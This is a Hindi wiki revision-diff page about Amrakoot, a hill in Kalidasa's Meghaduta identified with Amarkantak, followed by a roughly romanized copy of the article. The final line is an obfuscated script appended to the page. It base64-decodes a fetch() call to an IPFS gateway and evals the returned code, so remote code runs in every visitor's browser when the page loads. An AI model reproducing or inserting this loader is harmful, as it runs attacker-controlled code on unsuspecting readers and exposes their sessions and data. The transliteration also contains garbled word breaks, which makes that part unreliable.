Difference between revisions of "आम्रकूट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} #अमरकंटक को आम्रकूट भी कहते हैं। #कई वि...' के साथ नया पन्ना बनाया)
 
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''आम्रकूट''' को [[अमरकंटक]] भी कहते हैं। कई विद्वानों का मत है कि [[मेघदूत]]<ref>[[मेघदूत]] 1,16</ref> में वर्णित [[अमरकूट]] ही आम्रकूट है।  
#[[अमरकंटक]] को आम्रकूट भी कहते हैं।  
+
<blockquote>'त्वामासारप्रशमितवनोपप्लवं साधु मूर्ध्ना, वक्ष्यत्यध्वश्रमपरिगतं सानुमानाम्रकूट:' मेघ0, पूर्वमेघ 17 ।</blockquote>
#कई विद्वानों का मत है कि [[मेघदूत]] 1,16 में वर्णित अमरकूट ही आम्रकूट है।  
+
* उपर्युक्त पद्य में [[कालिदास]] ने आम्रकूट नामक [[पर्वत]] का वर्णन '''मेघ की रामगिरि''' से [[अलका नगरी|अलका]] तक की [[यात्रा]] के प्रसंग में [[नर्मदा नदी|नर्मदा]] से पहले ही अर्थात् उससे पूर्व की ओर किया है। जान पड़ता है कि यह वर्तमान [[पंचमढ़ी]] अथवा '''महादेव की पहाड़ियों''' <ref>[[सतपुड़ा पर्वत श्रेणी|सतपुड़ा पर्वत]]</ref> का कोई भाग है।
 +
* कई विद्वानों के मत में [[रीवा|रींवा]] से 86 मील दूर स्थित [[अमरकूट]] ही आम्रकूट है। किंतु यह स्पष्ट ही है कि इस पहाड़ का वास्तविक नाम अमरकूट न होकर आम्रकूट ही है क्योंकि कालिदास ने अगले<ref>पूर्वमेघ 18</ref> छंद में इस [[पर्वत]] को आम्रवृक्षों से आच्छादित बताया है- 'दन्नोपान्त: परिणतफलद्योतिभि: काननाम्रै: त्वययारूढे शिखरमचल: स्निग्धवेणी सवर्णे, नूनं यास्यत्यमर मिथुनप्रेक्षणीयामवस्थां मध्येश्याम: स्तन इव भुवश्शेषविस्तारपांडु:'।
 +
* संभव है नर्मदा के उद्गम [[अमरकंटक]], अमरकूट और आम्रकूट नामों में परस्पर संबंध हो और एक ही पर्वत-शिखर के ये नाम हों। निश्चय ही [[चित्रकूट]] आम्रकूट से भिन्न है क्योंकि चित्रकूट का वर्णन कालिदास ने पूर्वमेघ, 19 में पृथक् रूप से किया है।
 +
 +
 
 +
{{seealso|अमरकंटक|अमरकूट|कालिदास|मेघदूत}}
  
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 67| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 +
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
Line 11: Line 18:
 
[[Category:मध्य प्रदेश]]
 
[[Category:मध्य प्रदेश]]
 
[[Category:मध्य प्रदेश के ऐतिहासिक स्थान]]
 
[[Category:मध्य प्रदेश के ऐतिहासिक स्थान]]
[[Category:ऐतिहासिक स्थान कोश]]
+
[[Category:ऐतिहासिक स्थान कोश]][[Category:ऐतिहासिक स्थानावली]]
[[Category:नया पन्ना सितंबर-2011]]
 
  
 
__INDEX__
 
__INDEX__

Latest revision as of 07:22, 5 May 2018

amrakoot ko amarakantak bhi kahate haian. kee vidvanoan ka mat hai ki meghadoot[1] mean varnit amarakoot hi amrakoot hai.

'tvamasaraprashamitavanopaplavan sadhu moordhna, vakshyatyadhvashramaparigatan sanumanamrakoot:' megh0, poorvamegh 17 .

  • uparyukt pady mean kalidas ne amrakoot namak parvat ka varnan megh ki ramagiri se alaka tak ki yatra ke prasang mean narmada se pahale hi arthath usase poorv ki or kiya hai. jan p data hai ki yah vartaman panchamadhi athava mahadev ki paha diyoan [2] ka koee bhag hai.
  • kee vidvanoan ke mat mean rianva se 86 mil door sthit amarakoot hi amrakoot hai. kiantu yah spasht hi hai ki is paha d ka vastavik nam amarakoot n hokar amrakoot hi hai kyoanki kalidas ne agale[3] chhand mean is parvat ko amravrikshoan se achchhadit bataya hai- 'dannopant: parinataphaladyotibhi: kananamrai: tvayayaroodhe shikharamachal: snigdhaveni savarne, noonan yasyatyamar mithunaprekshaniyamavasthaan madhyeshyam: stan iv bhuvashsheshavistarapaandu:'.
  • sanbhav hai narmada ke udgam amarakantak, amarakoot aur amrakoot namoan mean paraspar sanbandh ho aur ek hi parvat-shikhar ke ye nam hoan. nishchay hi chitrakoot amrakoot se bhinn hai kyoanki chitrakoot ka varnan kalidas ne poorvamegh, 19 mean prithakh roop se kiya hai.


  1. REDIRECTsaancha:inhean bhi dekhean

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 67| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


  1. meghadoot 1,16
  2. satapu da parvat
  3. poorvamegh 18

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>